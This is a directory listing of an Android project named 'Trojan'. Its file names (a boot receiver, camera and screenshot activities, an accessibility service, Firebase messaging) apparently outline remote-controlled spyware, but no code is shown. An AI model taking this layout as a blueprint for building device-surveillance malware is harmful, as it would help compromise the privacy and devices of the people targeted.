# Trojan

./: build.gradle  gradle.properties  settings.gradle
.github/workflows/: android.yml
app/: build.gradle  google-services.json
app/src/main/: AndroidManifest.xml
app/src/main/java/com/trojan/: BootReceiver.java  CameraActivity.java  ImageDisplayActivity.java  MainActivity.java  MyExceptionHandler.java  MyFirebaseMessagingService.java  PowerAccessibilityService.java  ScreenshotActivity.java  TrojanApplication.java
app/src/main/res/layout/: activity_image_display.xml  activity_main.xml
app/src/main/res/values/: firebase_config.xml  strings.xml
app/src/main/res/xml/: accessibility_service_config.xml  network_security_config.xml
app/src/main/res/xml-v30/: accessibility_service_config.xml
app/src/main/res/xml-v34/: accessibility_service_config.xml
